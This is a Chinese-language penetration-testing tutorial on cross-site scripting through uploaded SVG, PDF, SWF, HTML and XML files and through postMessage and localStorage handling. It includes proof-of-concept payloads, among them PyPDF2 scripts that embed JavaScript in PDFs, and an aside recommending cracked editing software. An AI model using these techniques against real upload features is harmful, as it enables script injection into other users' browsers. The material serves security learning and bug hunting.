知識點：
1、Web攻防-XSS跨站-文件類型-html&pdf&swf&svg&xml
2、Web攻防-XSS跨站-功能邏輯-postMessage&localStorage

一、演示案例-WEB攻防-XSS跨站-文件類型觸發(fā)XSS-SVG&PDF&SWF&HTML&XML等

1、SVG-XSS

SVG(Scalable Vector Graphics)是一種基于XML的二維矢量圖格式，和我們平常用的jpg/png等圖片格式所不同的是SVG圖像在放大或改變尺寸的情況下其圖形質(zhì)量不會有所損失，并且我們可以使用任何的文本編輯器打開SVG圖片并且編輯它，目前主流的瀏覽器都已經(jīng)支持SVG圖片的渲染。

<svg xmlns="http://www.w3.org/2000/svg" version="1.1"><circle cx="100" cy="50" r="40" stroke="black" stroke-width="2" fill="red" /><script>alert(1)</script>
</svg>

通過文件上傳功能上傳一個SVG文件(該文件已經(jīng)提前植入XSS代碼)，然后在訪問這個上傳后的svg地址即可觸發(fā)上圖效果

2、PDF-XSS

制作工具：迅捷PDF編輯器試用版

(最好網(wǎng)上找破解版，然后導(dǎo)入其他正常的pdf，在正常的pdf插入js動作)

1、創(chuàng)建PDF，加入動作JS

2、通過文件上傳獲取直鏈

3、直鏈地址訪問后被觸發(fā)

利用python創(chuàng)建一個含有XSS的PDF文件

from PyPDF2 import PdfReader, PdfWriter
# 創(chuàng)建一個新的 PDF 文檔
output_pdf = PdfWriter()
# 添加一個新頁面
page = output_pdf.add_blank_page(width=72, height=72)
# 添加js代碼
output_pdf.add_js("app.alert('123');")
# 將新頁面寫入到新 PDF 文檔中
with open("xss.pdf", "wb") as f:output_pdf.write(f)

使用python3運行這個python文件即可在當(dāng)前目錄下生成一個XSS.pdf文件，用瀏覽器打開這個pdf即可觸發(fā)js代碼

參考地址：https://www.bmabk.com/index.php/post/151955.html

和正常PDF綁定from PyPDF2 import PdfReader, PdfWriter
# 打開原始 22.PDF 文件
input_pdf = PdfReader("22.pdf")
# 創(chuàng)建一個新的 PDF 文檔
output_pdf = PdfWriter()
# 將現(xiàn)有的 PDF 頁面復(fù)制到新文檔
for i in range(len(input_pdf.pages)):output_pdf.add_page(input_pdf.pages[i])
# 添加 javaScript 代碼
output_pdf.add_js("app.alert('123');")
# 將新 PDF 文檔寫入到文件中
with open("xssplus.pdf", "wb") as f:output_pdf.write(f)提前準(zhǔn)備好一個22.pdf文件，與當(dāng)前py腳本放在同一個目錄下，運行該py腳本即可在當(dāng)前目錄下生成一個xssplus.pdf

3、SWF-XSS

制作工具：Adobe Flash Professional CS6

1、新建swf文件(SWF文件是Flash動畫文件格式)

2、F9進(jìn)入代碼區(qū)域


3、屬性發(fā)布設(shè)置解析(root指當(dāng)前swf文件)

//取m參數(shù)
var m=_root.m;
//調(diào)用html中Javascript中的m參數(shù)值
flash.external.ExternalInterface.call(m);

觸發(fā)：?m=alert(/xss/)

實戰(zhàn)中如何利用

1.通過文件上傳自己制作的swf文件然后去訪問執(zhí)行


2、找到目標(biāo)上存在的swf文件進(jìn)行反編譯后搜索關(guān)鍵字找xss漏洞
反編譯項目：JPEXS Free Flash Decompiler

用JPEXS Free Flash Decompiler工具打開這個swf文件

測試swf文件xss安全性：
1、反編譯swf文件
2、查找觸發(fā)危險函數(shù)
3、找可控參數(shù)訪問觸發(fā)
xss一是指執(zhí)行惡意js，那么為什么說flash xss呢？是因為flash有可以調(diào)用js的函數(shù)，也就是可以和js通信，因此這些函數(shù)如果使用不當(dāng)就會造成xss。常見的可觸發(fā)xss的危險函數(shù)有：getURL，navigateToURL，ExternalInterface.call(最多)，htmlText，loadMovie等等

4、HTML-XSS

單純在HTML代碼中寫XSS代碼即可
<script>alert(123)</script>

5、XML-XSS

XML文件本身不能執(zhí)行JavaScript 代碼，XML中可以加載外部的資源方式來觸發(fā)XSS。

流程：通過文件上傳上傳x.xml文件，得到x.xml文件路徑，然后在上傳一個xss.xml文件，代碼中指向x.xml文件的路徑，瀏覽器訪問xss.xml就會觸發(fā)x.xml中的xss。

創(chuàng)建一個x.xml文件，內(nèi)容如下：
<?xml version="1.0" encoding="iso-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html><body>
<script>alert(/xss/);</script>
</body></html>
</xsl:template>
</xsl:stylesheet>

然后對其進(jìn)行引用：

創(chuàng)建一個xss.xml文件，內(nèi)容如下：
<?xml version="1.0" encoding="iso-8859-1"?>
<?xml-stylesheet type="text/xsl" href="http://127.0.0.1/x.xml"?>
<test></test>

二、演示案例-WEB攻防-XSS跨站-功能邏輯觸發(fā)XSS-PostMessage&LocalStorage

1、PostMessage XSS

一個用于在網(wǎng)頁間安全地發(fā)送消息的瀏覽器API。它允許不同的窗口（例如，來自同一域名下的不同頁面或者不同域名下的跨域頁面）進(jìn)行通信，而無需通過服務(wù)器。通常情況下，它用于實現(xiàn)跨文檔消息傳遞（Cross-Document Messaging），這在一些復(fù)雜的網(wǎng)頁應(yīng)用和瀏覽器插件中非常有用。

安全原因：當(dāng)發(fā)送參數(shù)可控且接收方處理不當(dāng)時，將導(dǎo)致XSS

模擬漏洞挖掘場景

打開http://192.168.1.4:82/60/receive.html
分析源碼

根據(jù)頁面源碼寫一個xss.html文件上傳上去來控制msg觸發(fā)XSS

黑盒挖掘

如何去挖這種隱藏比較深的漏洞，這里強(qiáng)推一個國外白帽寫的谷歌瀏覽器插件：
https://github.com/fransr/postMessage-tracker安裝之后，只要是當(dāng)前頁面創(chuàng)建了message事件監(jiān)聽，這個插件就會定位到其代碼。

白盒挖掘

找代碼中此操作類函數(shù)及關(guān)鍵字分析
復(fù)盤：https://mp.weixin.qq.com/s/M5YIkJEoHZK6_I7nK6aj5w

2、localStorage型xss（存儲型Xss升級版）

Web應(yīng)用使用localStorage在用戶瀏覽器中存儲數(shù)據(jù)。localStorage允許網(wǎng)頁在本地存儲鍵值對，這些數(shù)據(jù)可以在瀏覽器關(guān)閉后仍然保留，并且在同一域名下的不同頁面之間共享。當(dāng)應(yīng)用程序從localStorage中讀取數(shù)據(jù)并將其顯示在頁面上時，如果沒有對數(shù)據(jù)進(jìn)行充分的驗證和過濾，攻擊者就有可能通過修改localStorage中的數(shù)據(jù)來注入惡意腳本實現(xiàn)XSS。

安全原因：當(dāng)localStorage可控且有頁面有操作其數(shù)據(jù)，將導(dǎo)致XSS

黑盒挖掘：尋找輸入點（如表單、搜索框、評論區(qū)等），構(gòu)造測試用例找頁面調(diào)用

白盒挖掘：查找與localStorage相關(guān)的代碼段分析數(shù)據(jù)存儲及數(shù)據(jù)讀取

挖掘：先看目標(biāo)應(yīng)用localStorage

1、先找能控制的鍵名鍵值（怎么找）


2、再找對鍵名鍵值做輸出操作（怎么找）

或者也可以從js里搜索userData關(guān)鍵字找誰調(diào)用了這個值